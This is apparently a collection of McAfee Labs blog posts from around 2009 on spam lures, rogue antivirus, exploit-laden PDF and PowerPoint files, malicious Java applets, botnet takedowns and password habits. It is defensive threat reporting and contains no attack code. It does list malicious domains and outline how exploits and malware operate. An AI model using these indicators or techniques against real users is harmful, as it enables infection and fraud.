There were many honourable mentions in this year’s Xcon, but one of my favorites was the Hardware and Virtualization topic. The presenter, Nguyen Anh Quynh (a Vietnamese researcher who works for AIST Japan), presented for the second time at Xcon, this time talking about VM security in “Detecting Rootkits Inside Virtual Machines.” He ran a new rootkits detector tool called eKimono inside a VM (Xen’s Dom0) and scanned the memory of the guest VM for suspicious things.

This talk brought another recent VM session to mind, a Syscan talk “SADE: Injecting Agents into VM Guest OS,” by Matt Conover. It looks like VM technology as a defensive means is becoming more common than talking about how to exploit VM technology. (One such topic was the super-hot “Virtualized Rootkits” session in the last two years). Antiy Lab’s talk “Rediscovery on the Attack of Equipment and Signal” was also popular; the presenters did a live show on how to remotely intercept and decrypt the keystroking signals emitted by a wireless keyboard device. I can still remember their Xcon 2008 presentation about physical attacks. They demonstrated how to execute arbitrary code by inserting a USB device into a victim’s machine with AutoPlay functionality disabled. While the theory behind it was not disclosed, they declared this is definitely not achieved by physical memory modification through a device’s bus mastering DMA operation. As far as I know unlike Firewire (1394), which is an Expansion Bus Architecture, USB doesn’t have such a capability.

I missed some web-based security talks since I’m not so keen on scripts. (I’m a binary guy ) But I listened carefully to FunnyWei’s “Abnormity Usability Analysis” and Wang Tielei’s “Integer Overflow Vulnerability Auto-Mining,” especially the one by Dr. Wei, who developed a kind of prototype tool that can help in tracking the controllable data and execution flow which would aid in analyzing the usability of an abnormal situation.

One thing I noticed this year was that most topics focused on vulnerability mining or analyzing, but there was no talk directly dealing with exploiting vulnerabilities, such as the most popular and expected topic “Memory Protection Bypassing on Windows 7.” I remember that Alexander Sotirov gave such a speech targeting Windows Vista at last year’s event, and I hope there will be some breakthrough in this field in the coming year.

Looking forward to see you at xKungFoo 2009, in Beijing.

No matter how sophisticated security gets, we still need to handle the basics properly. One of the most basic tasks is to create and use secure passwords. You need them to log onto your computer, reach internal applications, and enter just about every website you visit. They are pervasive in our connected world.

But how many of us give any real thought to how secure our passwords are? Because we use them so often, we’re tempted to reuse the same one over and over again. However, as your mother might say, that’s a poor decision. Here are pros and cons of several common password techniques, and a simple-to-remember method that is both easy for you and hard for hackers.

Frequency and complexity
Our decisions about passwords are often some balance of frequency and complexity. The more frequently we use a password, the easier it is to remember it; and the more complex the password is, the less likely we will be able to remember it. This difficulty leads many people to use the same password for all their online accounts. Banking, auction, and social networking sites could have the same password for the same account name. In such a situation a hacker who compromises a single website can get the username and password for all of your accounts. It is important for people to remember that their website passwords are owned by that website, not by the individuals who entered them. Thus giving a website a password that accesses other accounts is not the best way to maintain security.

Users should avoid any password that can be cracked by a dictionary attack. If your password can be found in an unabridged dictionary, then it can be “guessed” by having a computer program try them all out. “123456” is not adequate to avoid a dictionary attack because it is the most commonly used password in existence. Using profanity may make talking about the password unacceptable in polite conversation, but that social boundary will not stop someone willing to breaking the law to steal your identity.

Password habits
Most people’s password habits fall into one of three categories:

• The global password. Many people use the same password everywhere. This is the worst password method; it means that someone who hacks a website that you bought something from years ago can now get into all your most frequently used accounts.
• The short list of passwords. Others create a hierarchical list of passwords that they reuse. This allows them to use their most complex password for financial websites, a simpler password for websites where items are purchased, and another password for social networking websites. This is exponentially better than the single global password, but exponentially better than “worst” is still not good.
• The black book of passwords. Some people choose a unique password for every website they visit, but because of the huge list of passwords they need to remember, they all are written on a pad of paper kept near the computer. This is not only unwieldy and not flexible (if you go on vacation and forget it), but you can lose the list or have it stolen by someone who gains brief access to your office or computer. Many corporate environments that force people to constantly change their passwords are littered with passwords on sticky notes or on paper in a drawer that is accessible by coworkers, cleaners, or burglars.

Creating your password algorithm
In creating passwords we want to maximize complexity and eliminate repeating passwords without adding any additional stress to our brains. To do this we need an internal algorithm that will generate a unique, difficult-to-guess password for every website we visit. The algorithm needs to be repeatable, so that remembering the passwords is not important: All we need to remember is the algorithm that generates the password. Thus we need to take something about to ourselves, add something unique about the website in question, and modify that information so that the algorithm is not obvious to anyone looking at the password.

Here is an example of a password for mcafee.com.

My token: light
The website: mcafee.com
The password: 123l1ghTjdqr33^!

In spite of the password’s complexity, the algorithm here is relatively simple. We start with “123,” and then add the word “light” with the “i” replaced with the number 1 and a capital “T” at the end. We add “jdqr33,” the letters (and numbers) above the word “mcafee” on my keyboard. We finish off with a bang—“^!”—to make sure we include some special characters.

Here’s another password with the same token and website:

The password: LlIiFCM999gh+

That’s the “li” in “light,” but with an upper and lowercase of each, then capitalized consonants from “mcafee” written backward, a few 9’s, and a “ght” with the “t” replaced by a plus sign.

Your algorithm can be anything you want, but you should choose one that includes numbers, letters (both capital and lowercase), as well as special characters. Some password validation algorithms don’t accept special characters, and others require you to start with a letter. These can be your second and third tries if you don’t get it on the first. Having a good password algorithm prevents someone from getting one password and using it on all your accounts, it also makes your password hard to guess, and it doesn’t require you to carry around a list of passwords.

In the case where your office administrator forces you to change your password frequently, you need only to write down the website token instead of the full password. So even if people find your little black book of passwords, they’ll be lost without the algorithm.

A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. As some active system processes and network data are volatile and may be lost after the computer is turning off, investigators were in search of a tool that could assist them in the very limited space of time they may have to investigate a crime. It is for this reason, that in October, Microsoft and the National White Collar Crime Center (NW3C) announced an agreement establishing NW3C as the first U.S.-based distributor of the Computer Online Forensic Evidence Extractor (COFEE).

Recently there seems to be a leak of the software onto the Internet. On Tuesday November 10, someone using the pseudonym DrWeird of Eti.in posted the documentation and a working build from Version 1.1.2 online.

Here are some details I collected from one of the posted manuals.

Working on Windows XP, COFEE consists of three major components: the GUI for the investigator, the command‐line application to be executed on the target machine, and the individual tools that are managed by COFEE and the command‐line application. As explained in the manual, the execution process is divided into three phases: tool generation, data acquisition, and report generation.

During the tool generation phase, digital forensics specialists can select tools to run against a target machine based on the individual case requirements. They can do this by either selecting a predefined profile, or by manually creating a profile and selecting which tools (including switches) to run against the target machine.

Two predefined profiles were developed to help investigators during the generation phase. The first is the Volatile Data Profile, which carries out a full forensic examination. None of the programs makes any direct writes to the suspect’s file system. The second, the Incident Response Profile, can be used when an investigator cannot perform a forensic analysis on the target machine. This profile is designed to have minimal impact on the suspect’s file system.

After “brewing” a cup of COFEE, investigators insert the USB device into the target machine. The data acquisition phase runs and all collected data will be stored on the USB stick.

After data collection, investigators can start the report generation phase by loading that information into the GUI console on the investigator’s machine and generate a report.

In the past, I pointed out that if law enforcement created dedicated tools, that one of these days they will certainly fall into crooked hands. These hands will be happy to study and re-use them for their own porpuses. The detection policies for the original piece of codes as well as its existing and potential future variants is still much debated. Today the disclosed program is not so sensitive; it is merely a repackaging of known utility tools many have been using for a long time. But this leak must remind us that people will use the same tools for very different reasons and goals.

What would you do if you saw an email in your inbox with a PDF named “U.S. ship thwarts second pirate attack November 18, 2009.pdf”? Would the title pique your curiosity? I hope not enough for you open the document!

This PDF is the latest in the ugly line of exploit- and malware-ridden embedded PDFs that damage your computer. If you were unfortunate enough to open the file, you’d see what the malware writers expect you to see: a file named “Adobe.pdf” with details on a real story about piracy off the coast of East Africa.

But behind the scenes, sinister things occur. The malicious PDF runs some JavaScript that exploits the Adobe Collab overflow (CVE-2007-5659) and Adobe getIcon (CVE-2009-0927) vulnerabilities. This screenshot shows the beginning of the compressed JavaScript stream:

In addition, two variants of ProcKill-EM are dropped into the Windows system folder, usually C:\Windows\system32.

As always, if you receive a document–PDF or otherwise–from someone you don’t know, don’t open  it. And even if you know the document’s sender, scan the file with your anti-virus program with the latest signatures before you open it.

McAfee customers are protected in the 5809 DATs against the threats mentioned above, as Exploit-PDF.aa and ProcKill-EM. Keep your signatures up to date and stay secure!

McAfee Labs has observed various spam runs exploiting the recent sensational Carrie Prejean news. The Prejean video is rapidly becoming one of the most searched-for topics ever on the net since the existence of the tape became common knowledge.

Source: Google Trends

Java applets provide everything from interactive features to web applications to advertisements. Since the birth of Java, attackers have exploited its security platform. Attackers are now taking advantage of a feature in Java to social-engineer not tech-savvy Internet users into infecting themselves with malware.

Here’s how an attack works:

• The bad guys spam a link claiming to be the Carrie PreJean video
• Then they trick victims into visiting a malicious website, which prompts users into running a Java applet to view the video

The signed applet contains a signature that browsers should verify through a remote, independent certificate-authority server. Once the signature is verified and the user also approves, the signed applet can gain more rights, becoming equivalent to an ordinary application. When the app is injected into a trusted website, users would hardly take the trouble to validate if the certificate is legitimate.

• At this point, the applet runs in the browser, which in turn downloads a malicious executable that launches itself on the victim’s machine

This approach is very effective for the following reasons:

• It’s easier to social-engineer users, as many rich multimedia applications use Java
• Unlike spammed links that contain a cocktail of exploits or a zero-day attack, this approach exploits the applet’s design
• The attack is independent of browser type and version
• The attack works on a machine with the latest version of Java, which makes the exploit all the more dangerous

The malicious applet has almost no detection on Virustotal, but it is detected by McAfee with the current DATS as Exploit-ByteVerify.b. The malicious executable incorporates SMTP functionality that is capable of sending spam and is currently detected as BackDoor-EHP.

We urge users to handle unknown Java applets with caution and make sure any digital signature comes from a trusted authority before executing it.

One year ago today email administrators were astonished to notice the amount of spam hitting their mail servers had plunged precipitously. Email volumes dropped off as much as 60 percent to 70 percent, and the reason wasn’t immediately obvious to anyone except for the folks who knew that McColo, a major spam-hosting ISP had been taken offline. Three of the largest spam-sending botnets at the time–Rustock, Srizbi, and Mega-D–had command and control machines hosted at McColo and were drastically affected. Mega-D’s volume dropped by more than 95 percent and Srizbi volumes dropped by more than 80 percent.

However, only days after McColo was taken offline, it was reconnected for a brief period–about 12 hours–by its uplink provider, giving just enough time for the Rustock botnet owners to recommunicate with their infected machines and point the command and control centers to other service providers. Rustock quickly regained its status as a top spam distributor. The Mega-D botnet owners also bounced back until it was shut down just this past week. Srizbi, which once accounted for more than 50 percent of spam volume, never recovered and is no longer a factor in today’s spam wars.

What has happened since McColo was shut down? Did spam volumes ever recover from the loss of three of the largest spam-sending botnets? Not only did spam volumes recover, unfortunately, but they recovered quickly and have greatly surpassed the volumes that we saw before McColo was taken offline.

You can see in the preceding graph where volumes stood and how they dropped off after McColo was cut off. However, the shutdown’s effect was brief and ultimately small. We have seen dramatic increases since then due to the relaunching of botnets such as Rustock as well as new botnets such as Bredo (which primarily sends fake nondelivery notifications spoofing package delivery services like FedEx, DHL, and UPS) and Waledac (the rebirth of the Storm botnet). Spam volumes have more than doubled since just February 2009, dwarfing several times over the decreases due to McColo’s demise.

The McColo closure as a single event remains significant, but when you compare it with the huge increases in volumes that we have seen since then–because of increased spoofs against social media sites through viruses like Koobface and spam continuing to be major factors in the successes of Rustock and Cutwail–the decrease now reflect only a momentary blip on the radar. 

Nonetheless, you should expect to see more of these types of takedowns as security researchers and research organizations continue to get involved, but you should also expect the overall effect of those shutdowns to be temporary. McColo has taught botnet owners a lesson. As a result botnet control centers have become more distributed, spanning many networks in many countries. Today taking down a big hosting provider would prove only a minor inconvenience as opposed to a major victory for security forces.

The idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Big Bird’s birthday.

It’s not new that the Google logo includes Big Bird; it does so on special occasions. The Google logo clearly shows Today’s Hot Trends, and that’s a target for malware writers.

This year is the fortieth anniversary of Sesame Street, and the bad guys have begun their attack. Searching for keywords such as Big Bird’s birthday and Big Bird on Google displays pages with compromised sites.

Watch the video below, which shows how rogue anti-spyware attacks a system.

The video shows that the malware is literally pushed onto the system regardless of what the user does. In the past we have seen malware injected into a compromised site through exploits and iframes. Today, malware often attacks only from a search-results page. In certain attacks, if a user directly accesses a compromised site, then there’s no redirection to a payload and no infection.

Users have no idea what they will get by clicking on search results, which now are like a virtual minefield; you never know what will happen next. McAfee strives to protect users from such attacks through its free SiteAdvisor technology. It warns users with green, yellow, and red alerts next to each search result. You can minimize your risk of attack by using SiteAdvisor and paying attention to what you are clicking on.

The McAfee Online Support Community gives you a way to interact with other McAfee business users to ask questions and share best practices. Additionally, you’ll be able to talk with McAfee professionals about McAfee products, security awareness issues, and emerging trends—plus give us feedback on product and service enhancements.

The new community will have main areas for Business users, Home/Home Office users, Security Awareness, and Community Help. Through discussions, blogs, wikis, profiles, polls, and special interest groups, you’ll find the McAfee Online Support Community a great place to be.

Go to http://community.mcafee.com to explore, join, and participate today!

We all know the dangers of peer-to-peer (P2P) networks and their role in distributing malware. Most people who deal with this problem work tirelessly to limit the impact of these potential threat points by (among other things) adding anti-virus, firewalling, watching network flows for P2P traffic, and usually outright banning of P2P applications.

They may, however, be looking the wrong way. The bits and bytes flow in two directions–in and out. Data leakage from a network is just as serious as bringing in malware-laden MP3s, cracked software, or Mov files.

You may be thinking to yourself, “Yeah, but leaking information is for disgruntled employees, or those looking to profit from foreign spies being ‘in the market’ for specific secret data. I don’t employ people who would do that.”

For arguments sake, let’s say that you do in fact employ workers who are of the highest moral character, you’ve firewalled the outside, banned the applications, monitor the network traffic, and updated your anti-virus signatures.

So what happens when one of your employees is out sick–yet a big presentation is still due on Friday? Any chance he or she may take work home to finish when “there just aren’t enough hours in the day”?

The vector does not even need to be company-owned. If an employee is emailed the presentation, or copies it onto a USB device, this is the time that the data is the most vulnerable–it’s out of your control. Most home users do not implement the same security practices that a company does. If that data is moved into a directory reachable by the P2P application, it is reachable by potentially millions of users on the same P2P network. Do you think a file called OurSecretFormula.doc would look enticing?

For those ever-present naysayers, here is a recent example of this occurring.

So the moral of this story is not that this is new or ground breaking–it certainly isn’t. It’s just a reminder to look both ways.

Festive search words are a favorite with scammers as a lure to their offerings, as my colleague David Marcus recently warned us about Halloween-themed threats.

In recent research, we have found that search results for “scary halloween pumpkin designs” could lead users to a hijacked web page that hosts rogue security products.

Upon clicking the hyperlink, the user sees a website hosted on xxx.allxxxxxshxxx.com. The site presents a fake “Windows Security Alert” window that is identical to the scam reported by McAfee Labs’ Avelino Rico Jr. in his recent blog. The “alert” warns visitors of fake infections and requires the victims to download a tool to remove them.

What happens after installing this tool is the same as many other rogue AV or FakeAlert stories we’ve reported. This malware is now detected as FakeAlert-JW Trojan.

Watch out for this and other malware during Halloween season, and keep your security products updated.

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Here’s another:

And our favorite with a holiday spin:

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Keep your security updated and search safely this week!

I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending of your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how those malwares usually spread:

This version of PWS-Banker, besides grabbing passwords and screenshots, will also download Microsoft MSN Messenger. Or an app that at least looks like Messenger.

When you enter your username and password and click enter, the app will exit. But, in the background it will message all your contacts on your behalf, sending nice notes with links.

Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

and

Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

Here are the answers, starting from the top and working downward.

1) The windows are different, and you can see the minimize/maximize/close buttons are different
2) The help icon is the same, but when you click on it, no option is clickable
3) The dropbox on the login name doesn’t work
4) The status drop box doesn’t work
5,6,7) The check boxes don’t work

Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

Common subjects to beware of include:

Little boy trapped in balloon
Boy-balloon-madness
balloon kid’s full story
Balloon boy died
Little boy trapped in balloon
Balloon boy died
balloon kid’s full story
Boy-balloon-madness
Drama with balloon(exclusive)

Be careful what you click, and mind the news. It is often the lure the spammers look for.

My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

We’ve seen subjects that include:

Microsoft Windows 7 special offers
Windows 7 SP 2
Windows 7 FAQ on release
Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
Windows7 ultimate 86% off
Windows7 ultimate 57% off

We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

I thank my colleague Adam Wosotowsky for the background data!

In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

One of the most interesting talks was made by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company the Federal Trade Commission accused of spreading some massive “scareware” schemes–alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to call a halt to the company’s activities and freeze the assets of those behind the scams.

Explaining that Innovative has more than 600 employees in real offices, subsidiaries in various countries such as India, Poland, Canada, United States, and Argentina and complete with customer-calling centers, Dirk said the company received approximately 4.5 million order IDs in 11 months or, in other words, US$180 million dollars (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appears to be a legitimate front. Following its legal troubles, it is now a defunct company; yet many employees have joined a new entity that has the same production targets.

The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European countries’ cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters used the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

In the second part of his talk, Dmitri presented an events timeline of the Eastern European carding underground:

He discussed CarderPlanet, and its hierarchical structure set up like a mafia (and the source for the following image: NICSA-FBI-SSA, Michael J. McKeown )

CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

The last piece of news on carding and phishing demonstrates the size and the worldwide organization of the actual cybercrime gangs.

• In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to the Ukraine and Russia.
• In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. 34 were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
• This month in the United States, the FBI announced the results of the Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identify theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

Spammers are always looking for techniques that can beat the spam filters. We have seen various techniques for spamming–like obfuscating words, embedding text in images, spoofing urls, abusing social networking sites, and many other techniques for spam to avoid getting caught.

One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers for displaying graphics.

Example:

______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

The clever thing is that each line has some random characters with _ and | characters, which do not resemble any part of the word replica. If we take the entire picture into consideration, though, our eyes can read it as a word. The spammers try to take advantage of this to pass through spam filters and deliver their intended message.

Not only are the words represented in this manner but even URLs can be displayed in this way to avoid the blacklisting of the domains.

ASCII art spam is not limited to only nonword characters. It can be numbers, alphabets, and combinations of both, which can make things even worse for certain spam filters:

dP""b8  88     db     88     88  dP"Y8
dP      88    dPYb    88     88 `bo
Yb      88   dP__Yb   88     88   `Y8b
 YboodP 88  dP""""Yb  88ood8 88  8bodP'

In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.

We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

The report can be downloaded here.

I am excited to be involved in the joint industry effort of defining an XML format which will allow for the rapid exchange of information between security companies. This work was done by the “Malware Working Group” operating as part of the “Industry Connections Security Group” (ICSG) and under the umbrella of the IEEE. If you Google for “IEEE” and “ICSG” you should have the link at the top of the list – IEEE ICSG .

There were about 20 people from multiple security companies who contributed to the development of the proposal for the standard and I am very pleased with the results. It is a simple, flexible and powerful format that is already being used by 4 anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the trivial malware sample exchange of the past with a real-time exchange of threat intelligence data. Communicating the relationships between malware samples, domains, IPs will open endless possibilities for improving the security of all Internet users.

For example, it will allow us to describe the whole history of domains/IPs that were used by a specific malware writing group, which malware they hosted and even how the malware got installed onto users’ computers. And this can be expressed in an unambiguous way suitable for rapid automated analysis. In a word – it’s powerful!

But there are huge benefits even in trivial transmitting of the simplest malware prevalence data:

• If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
• If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
• If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

Here is how a portion of the XML with meta-data looks like.

If you are interested - the complete XML schema is available here and if you want to get involved please get in touch with your current point of contact at McAfee Labs.

Recently, we analysed samples of a new fake anti-virus program that brands itself as Alpha Antivirus. This program uses the following filenames: alphaav.exe and msnaoladdon.dll.

Alpha Antivirus is a new FakeAlert variant evolved from the Personal Antivirus family of rogue anti-virus software. Like many FakeAlert malware, Alpha Antivirus promotes itself through the use of pop-up web pages hosted on malicious websites. These web pages mimic a Windows Explorer folder and a Windows Security Alert dialog, and perform a free but fake online scanning of the affected system.

The following domains were known to host the fake online-scanning web pages and the main executable of Alpha Antivirus:

• mycompinfo17.com
• internetantivirusproscanner.com
• mycomputeronlinescan11.com
• internetsecurityscan.com
• mycompscanner07.com
• mycompscanner42.com
• internetantivirusproscan.com
• windowsdefenderupdate5.com
• securitybugfixupdate6.com

The software prompts the user to install Alpha Antivirus. Once executed, it launches fake scanning and reports multiple infections:

It also displays misleading pop-up warnings on the Windows taskbar.

This variant drops a copy of itself as %ProgramFiles%\AlphaAV\AlphaAV.exe and a msnaoladdon.dll component in the Windows System folder, and installs the DLL file as a browser helper object.

(%ProgramFiles% refers to the Programs folder, for example, C:\Program Files.)

AlphaAV.exe is detected as FakeAlert-DI, while msnaoladdon.dll is detected as FakeAlert-EQ.

Frequently, we see abrupt changes in branding, filenames, and GUIs used by the same fake anti-virus programs. As more security vendors and researchers publish their findings about new rogue anti-virus programs, malware authors try to repackage their “products” with new brand names and filenames and try to use more obfuscation and encryption on their files in an attempt to avoid being recognised by users and in some cases evade detection by security vendors.

Some known brand name and filename changes:

1. From pav.exe + winexplorer.dll to personalav.exe + msxmlm.dll. (Personal Antivirus), and again to alphaav.exe + msnaoladdon.dll (Alpha Antivirus)

2. From frmwrk32.exe to winupdate.exe (Antivirus XP/Pro)

3. From pcdef.exe + mousehook.dll + ntdll64.dll (WinPC Defender) to winav.exe + ieocx.dll + iehostcx32.dll (WinPC Antivirus)

4. From Spyware Protect 2009 to Antivirus System Pro

As a gentle reminder to all users: Avoid visiting untrusted websites, install anti-malware products only from trusted and legitimate sources, and update the DATs regularly.

The use of social engineering to grab attention of recipients and to deliver malware is not something novel. The latest trend in spreading malware is to manipulate a happening celebrity story, disaster or other high profile news event. The threat could be delivered as emails or poisoned search engine results which leads to malware. In the past, we have come across innumerable incidents like Michael Jackson demise or Benazir Bhutto assassination used as an arena to spread malware. Lately, we have observed an increase in the number of OLE files being used as targeted attacks against various high profile users.

The exploit and lure claims to contain information on the Pakistani Air Force and arrives via email as a PowerPoint document attachment. When an unsuspecting user having a vulnerable version of PowerPoint launches the document, the vulnerability is exploited and the malicious payload is executed.

The vulnerability is with a malformed record within PowerPoint which can be exploited to execute malicious code. The shellcode makes use of the Process Environment Block (PEB) approach to determine the kernel32.dll base address as shown in the figure below.

Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

The malicious PPT file is exploiting an older vulnerability which was patched by Microsoft in ms06-028 bulletin. This attack is detected with the current DATS as Exploit-PPT.h and the dropped malicious executable is detected as BackDoor-EFB.

Today Avert Labs has published a new research paper, “Inside the Password-Stealing Business: the Who and How of Identity Theft.” With so many financial transactions occurring online today, stealing passwords to banks and other accounts is an irresistible attraction for cybercriminals. Thieves around the world use Trojans and other malware to grab user credentials, which they can resell to their crooked clientele while supporting their own illegal businesses.

Our report uncovers technical details on the capabilities, level of sophistication, and inner workings of the most infamous contemporary password-stealing malware families such as Zbot, Sinowal, and Steam Stealer. We also discuss the prevalence of such malware, distribution channels, how criminals keep up with the changes banks make to keep transactions secure, and how they exploit today’s economic climate. Offering illegal “work at home” opportunities to desperate job seekers is one way criminals lure the unsuspecting into furthering their illegal activities.

You’ll find our report here in English and eight more languages.

Want to peek inside another one of these infamous password thieves? Let’s have a look at SilentBanker.

Our story starts with browser helper objects (BHOs), which are plug ins for Internet Explorer. BHOs give developers the opportunity to extend the browser’s functionality without their having access to the browser’s source code. That doesn’t sound too bad, as users aren’t forced to rely on the browser’s developers to implement new features. Even if you’re not a developer, it’s seems useful to download any desired extension, whether you want to customize the user interface or be able to read PDF documents directly in the browser, isn’t it? Well, yes and no! The answer depends on the trustworthiness of the BHO’s author, the server you download from, or the DNS server. Unfortunately, not all BHOs are safe applications—the bad guys are always looking for ways to turn originally useful features into a way to deploy their malware, hunting for usable information such as credentials. Silentbanker is one of those nasty password-stealing malware that comes in the form of a BHO.

